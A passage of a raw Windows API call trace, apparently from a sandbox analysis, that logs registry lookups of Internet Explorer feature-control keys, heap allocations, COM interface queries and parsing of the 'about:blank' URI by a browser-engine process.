pcbData=0x2ce6bc*=0x4) returned 0x2 [0065.992] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2ce62c | out: phkResult=0x2ce62c*=0x154) returned 0x0 [0065.992] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2ce630 | out: phkResult=0x2ce630*=0x150) returned 0x0 [0065.992] RegOpenKeyExW (in: hKey=0x150, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x2ce5ec | out: phkResult=0x2ce5ec*=0x0) returned 0x2 [0065.992] RegOpenKeyExW (in: hKey=0x154, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x2ce5ec | out: phkResult=0x2ce5ec*=0x0) returned 0x2 [0065.992] RegCloseKey (hKey=0x0) returned 0x6 [0065.992] RegCloseKey (hKey=0x0) returned 0x6 [0065.992] RegCloseKey (hKey=0x154) returned 0x0 [0065.992] RegCloseKey (hKey=0x150) returned 0x0 [0065.992] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x97c) returned 0x442fc8 [0065.993] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x480) returned 0x443950 [0065.993] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.993] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.993] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.993] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.993] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x43ee00 [0065.993] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x43ee58 [0065.993] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x43f280 [0065.994] GetCurrentThreadId () returned 0x90 [0065.994] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f920 [0065.994] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2c) returned 0x42d808 [0065.994] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x43f2d8 [0065.994] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc169 [0065.994] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x4334f8 [0065.994] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1 [0065.995] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x75028cd4, dwReserved=0x0 | out: ppSM=0x75028cd4*=0x43f360) returned 0x0 [0066.000] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x64) returned 0x444218 [0066.071] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x43f3c8 [0066.072] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x28) returned 0x42d120 [0066.072] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x433518 [0066.072] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x429220 [0066.072] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x429270 [0066.072] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x444288 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x64) returned 0x4442f0 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x4292c0 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x444360 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x444620 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x429310 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x429360 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x4293b0 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4443c8 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x444718 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x429400 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x429450 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x444780 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x140) returned 0x444818 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x43ba20 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x28) returned 0x42d150 [0066.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x433538 [0066.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xd0) returned 0x43c4d0 [0066.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x38) returned 0x43eeb0 [0066.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x128) returned 0x444960 [0066.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x148) returned 0x444a90 [0066.074] GetCurrentThreadId () returned 0x90 [0066.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x5c) returned 0x444be0 [0066.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x433558 [0066.074] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x2ce9dc | out: ppURI=0x2ce9dc*=0x43bc54) returned 0x0 [0066.075] IUri:GetPropertyDWORD (in: This=0x43bc54, uriProp=0x11, pdwProperty=0x2ce9c4, dwFlags=0x0 | out: pdwProperty=0x2ce9c4*=0x11) returned 0x0 [0066.075] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x4436fc, dwReserved=0x0 | out: ppSM=0x4436fc*=0x444c48) returned 0x0 [0066.076] IInternetSecurityManager:SetSecuritySite (This=0x444c48, pSite=0x443704) returned 0x0 [0066.076] IUnknown:AddRef (This=0x443704) returned 0x28 [0066.076] IUnknown:QueryInterface (in: This=0x443704, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2ce994 | out: ppvObject=0x2ce994*=0x443708) returned 0x0 [0066.076] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x444c70 | out: ppvObject=0x444c70*=0x0) returned 0x80004002 [0066.076] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x444c6c | out: ppvObject=0x444c6c*=0x0) returned 0x80004002 [0066.076] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x444c68 | out: ppvObject=0x444c68*=0x0) returned 0x80004002 [0066.076] IUnknown:Release (This=0x443708) returned 0x0 [0066.076] IInternetSecurityManager:GetSecurityId (in: This=0x444c48, pwszUrl="about:blank", pbSecurityId=0x2cea30, pcbSecurityId=0x2cea24*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2cea30*=0x61, pcbSecurityId=0x2cea24*=0xf) returned 0x0 [0066.183] DllGetClassObject (in: rclsid=0x441274*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x2cdfb0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cd668 | out: ppv=0x2cd668*=0x75028c70) returned 0x0 [0066.184] IUnknown:AddRef (This=0x75028c70) returned 0x1 [0066.184] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.184] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ce22c | out: ppvObject=0x2ce22c*=0x75028c70) returned 0x0 [0066.184] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.184] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce3ec | out: ppvObject=0x2ce3ec*=0x75028c7c) returned 0x0 [0066.184] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.184] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x433618, cchResult=0xc, pcchResult=0x2ce434, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x2ce434*=0xc) returned 0x0 [0066.184] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c) returned 0x445880 [0066.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445880 | out: hHeap=0x410000) returned 1 [0066.184] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.185] DllGetClassObject (in: rclsid=0x441274*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ce300 | out: ppv=0x2ce300*=0x75028c70) returned 0x0 [0066.185] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce3ec | out: ppvObject=0x2ce3ec*=0x75028c7c) returned 0x0 [0066.185] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.185] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x433618, cchResult=0xc, pcchResult=0x2ce444, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2ce444*=0x0) returned 0x800c0011 [0066.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.185] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.186] IUnknown:Release (This=0x43bc54) returned 0x2 [0066.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.186] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf) returned 0x43f968 [0066.186] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f998 [0066.186] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x2cea04, dwReserved=0x0 | out: ppSM=0x2cea04*=0x446e80) returned 0x0 [0066.186] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf) returned 0x43f9e0 [0066.186] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x446dc8 [0066.187] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cebb4 | out: phkResult=0x2cebb4*=0x198) returned 0x0 [0066.187] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cebb8 | out: phkResult=0x2cebb8*=0x1a4) returned 0x0 [0066.187] RegOpenKeyExW (in: hKey=0x1a4, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x2ceb74 | out: phkResult=0x2ceb74*=0x0) returned 0x2 [0066.187] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x2ceb74 | out: phkResult=0x2ceb74*=0x0) returned 0x2 [0066.187] RegCloseKey (hKey=0x0) returned 0x6 [0066.187] RegCloseKey (hKey=0x0) returned 0x6 [0066.187] RegCloseKey (hKey=0x198) returned 0x0 [0066.187] RegCloseKey (hKey=0x1a4) returned 0x0 [0066.188] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x128) returned 0x44a610 [0066.188] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44a740 [0066.188] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fa10 [0066.188] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x2000) returned 0x44a798 [0066.188] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44c7a0 [0066.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44c7a0 | out: hHeap=0x410000) returned 1 [0066.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.188] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x2ce9f8 | out: ppURI=0x2ce9f8*=0x43bc54) returned 0x0 [0066.189] DllGetClassObject (in: rclsid=0x441274*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ce2d0 | out: ppv=0x2ce2d0*=0x75028c70) returned 0x0 [0066.189] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce3bc | out: ppvObject=0x2ce3bc*=0x75028c7c) returned 0x0 [0066.189] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.189] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x433618, cchResult=0xc, pcchResult=0x2ce404, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x2ce404*=0xc) returned 0x0 [0066.189] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c) returned 0x445880 [0066.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445880 | out: hHeap=0x410000) returned 1 [0066.189] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.190] DllGetClassObject (in: rclsid=0x441274*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ce2d0 | out: ppv=0x2ce2d0*=0x75028c70) returned 0x0 [0066.190] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce3bc | out: ppvObject=0x2ce3bc*=0x75028c7c) returned 0x0 [0066.190] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.190] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x433618, cchResult=0xc, pcchResult=0x2ce414, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2ce414*=0x0) returned 0x800c0011 [0066.190] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.190] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.190] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.190] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.190] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0066.191] IUnknown:Release (This=0x43bc54) returned 0x2 [0066.191] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2c) returned 0x42d840 [0066.191] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4248a0 [0066.191] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x5c) returned 0x44c7a0 [0066.192] GetDC (hWnd=0x0) returned 0x1b0101ce [0066.192] GetDeviceCaps (hdc=0x1b0101ce, index=88) returned 96 [0066.192] ReleaseDC (hWnd=0x0, hDC=0x1b0101ce) returned 1 [0066.192] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000 [0066.193] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cec50 | out: phkResult=0x2cec50*=0x130) returned 0x0 [0066.193] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cec54 | out: phkResult=0x2cec54*=0x198) returned 0x0 [0066.193] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x2cec10 | out: phkResult=0x2cec10*=0x0) returned 0x2 [0066.193] RegOpenKeyExW (in: hKey=0x130, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x2cec10 | out: phkResult=0x2cec10*=0x0) returned 0x2 [0066.193] RegCloseKey (hKey=0x0) returned 0x6 [0066.193] RegCloseKey (hKey=0x0) returned 0x6 [0066.193] RegCloseKey (hKey=0x130) returned 0x0 [0066.193] RegCloseKey (hKey=0x198) returned 0x0 [0066.193] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x424ae0 [0066.193] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x4294a0 [0066.193] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5c) returned 0x44c808 [0066.194] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0066.194] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSRWLock") returned 0x77c78456 [0066.194] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockExclusive") returned 0x77c729f1 [0066.194] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockShared") returned 0x77c72560 [0066.194] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockExclusive") returned 0x77c729ab [0066.194] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockShared") returned 0x77c725a9 [0066.194] RtlInitializeConditionVariable () returned 0x44c83c [0066.194] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x44c870 [0066.195] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x44c8b0 [0066.195] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x433618 [0066.195] IUnknown:AddRef (This=0x442fc8) returned 0x0 [0066.195] IUnknown:Release (This=0x442fc8) returned 0x1 [0066.195] IUnknown:Release (This=0x75028cb0) returned 0x1 [0066.195] IUnknown:QueryInterface (in: This=0x442fc8, riid=0x74cab75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cfa24 | out: ppvObject=0x2cfa24*=0x442fc8) returned 0x0 [0066.195] IUnknown:Release (This=0x442fc8) returned 0x1 [0066.195] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x42d1b0 [0066.235] IUnknown_QueryService (in: punk=0x750296a4, guidService=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x443020 | out: ppvOut=0x443020*=0x0) returned 0x80004005 [0066.235] IUnknown:QueryInterface (in: This=0x750296a4, riid=0x773042d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2cf9a0 | out: ppvObject=0x2cf9a0*=0x750296b8) returned 0x0 [0066.235] IServiceProvider:QueryService (in: This=0x750296b8, guidService=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x443020 | out: ppvObject=0x443020*=0x0) returned 0x80004005 [0066.235] IUnknown:Release (This=0x750296b8) returned 0x1 [0066.235] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x34) returned 0x44c8f0 [0066.235] IInternetSecurityManager:SetSecuritySite (This=0x444c48, pSite=0x443704) returned 0x0 [0066.235] IUnknown:Release (This=0x443704) returned 0x0 [0066.235] IUnknown:AddRef (This=0x443704) returned 0x28 [0066.235] IUnknown:QueryInterface (in: This=0x443704, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2cf9d8 | out: ppvObject=0x2cf9d8*=0x443708) returned 0x0 [0066.236] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x444c70 | out: ppvObject=0x444c70*=0x0) returned 0x80004002 [0066.236] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x444c6c | out: ppvObject=0x444c6c*=0x0) returned 0x80004002 [0066.236] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x444c68 | out: ppvObject=0x444c68*=0x750296bc) returned 0x0 [0066.236] IUnknown:Release (This=0x443708) returned 0x0 [0066.236] CoTaskMemAlloc (cb=0x6d) returned 0x44c930 [0066.236] CoTaskMemAlloc (cb=0x9) returned 0x43fa40 [0066.236] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x43fa58 [0066.236] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44c9a8 [0066.240] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0066.240] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x44) returned 0x4294f0 [0066.241] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x43fa70 [0066.241] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fa88 [0066.243] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4) returned 0x43baf0 [0066.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4458f8 [0066.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x43faa0 [0066.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x94) returned 0x44ca00 [0066.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x44caa0 [0066.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x70) returned 0x44cae0 [0066.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf8) returned 0x44cb58 [0066.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8b4) returned 0x44cc58 [0066.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fab8 [0066.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fad0 [0066.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x84) returned 0x44d518 [0066.335] RtlAllocateHeap 